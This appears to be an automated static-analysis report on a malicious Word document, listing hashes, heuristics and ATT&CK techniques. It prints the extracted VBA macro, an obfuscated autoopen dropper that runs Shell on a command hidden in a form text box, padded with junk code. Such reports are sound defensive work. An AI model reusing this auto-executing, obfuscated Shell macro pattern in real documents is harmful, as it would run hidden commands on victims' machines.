Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e146e3d2c4d55630…

MALICIOUS

Office (OLE)

88.2 KB Created: 2018-12-26 12:29:00 Authoring application: Microsoft Office Word First seen: 2019-01-25
MD5: b197af97b4f6ca0a7138b60c2dd3e012 SHA-1: 9f7f08c2bce39567d8bda99b3e592deeb2691aed SHA-256: e146e3d2c4d556306de859b24a5c0443dcbc55befcfef7d8669efa0583c5ee4d
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The critical heuristic firing indicates a Shell() call within the VBA code, and the autoopen macro suggests immediate execution upon opening. The script attempts to use the Shell function, likely to download and execute a secondary payload, which is a common technique for malware droppers.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3765 bytes
SHA-256: b1bc50d7f3a8e7c509fc11a741d3782a8d9ae79f52065b691ded4b9bf0b2ff42
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Z9826672168"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
X4430 = 262 - 102
j543 = 935 - 66
z941 = 614 - 194
b16190
o9483 = 804 - 461
Q438 = 963 - 530
A330 = 730 - 826
End Sub

Attribute VB_Name = "j891537430"
Function b16190()
On Error Resume Next
   For Each q1466 In F059
      K661 = Round(H4767 / CSng(o088))
      If O2840 Or w5385 Then
         r9600 = Sin(f2351)
      End If
      s390 = CSng(N4986 * CBool(o8647))
      If G9986 > l2281 Then
         h482 = Oct(Z780 - z4623 / 973 - Round(752 + Sin(Y606)))
      End If
   Next
J84519653 = Array(E21751797, r5246840, i223206, Interaction.Shell(("" + i226281 + F85929797 + Z9826672168.TextBox1) + u9535334 + r45727709 + b933981, 94 - 94), f331254, d45212059, W0556427)
   For Each n472 In Q1263
      c340 = Round(G949 / CSng(P943))
      If z695 Or C699 Then
         l1799 = Sin(N3502)
      End If
      j507 = CSng(k656 * CBool(v646))
      If D031 > Y452 Then
         Z061 = Oct(v3080 - d899 / 224 - Round(444 + Sin(W216)))
      End If
   Next
   For Each n7594 In h4007
      v2051 = Round(t236 / CSng(U9957))
      If W4911 Or C602 Then
         I232 = Sin(u5835)
      End If
      l6053 = CSng(B1661 * CBool(c7859))
      If z0118 > I3760 Then
         i446 = Oct(N2722 - w7726 / 664 - Round(517 + Sin(U714)))
      End If
   Next
End Function


Attribute VB_Name = "Q30883096"

Attribute VB_Name = "z504777785342"

Attribute VB_Name = "M0010709"

Attribute VB_Name = "Q307582223121"

Attribute VB_Name = "w7981085811"

Attribute VB_Name = "l1177845704"

Attribute VB_Name = "G1011057"

Attribute VB_Name = "F2868275"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Y235542137601"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Z802497006618"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "T9947086763"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "R6220835746982"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "w45484728297236"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False